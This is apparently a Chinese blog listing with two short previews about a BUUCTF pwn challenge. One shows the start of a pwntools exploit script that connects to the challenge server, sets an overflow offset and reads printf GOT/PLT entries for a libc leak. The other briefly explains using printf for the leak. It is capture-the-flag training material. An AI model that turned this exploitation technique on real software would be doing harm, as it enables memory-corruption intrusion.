exp

January 14, 20261 分钟阅读 BUUBUU

from pwn import * from LibcSearcher import LibcSearcher context(arch='i386', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',26718) # 与在线环境交互。 offset = 0x2c + 0x4 vuln_addr = 0x804852F elf = ELF("./pwn") printf_got = elf.got['printf'] printf_plt =...

wp

March 23, 20261 分钟阅读 BUUBUU

这是一道libc寻址的题 寻址时没有read,write,puts。所以用printf exp:exp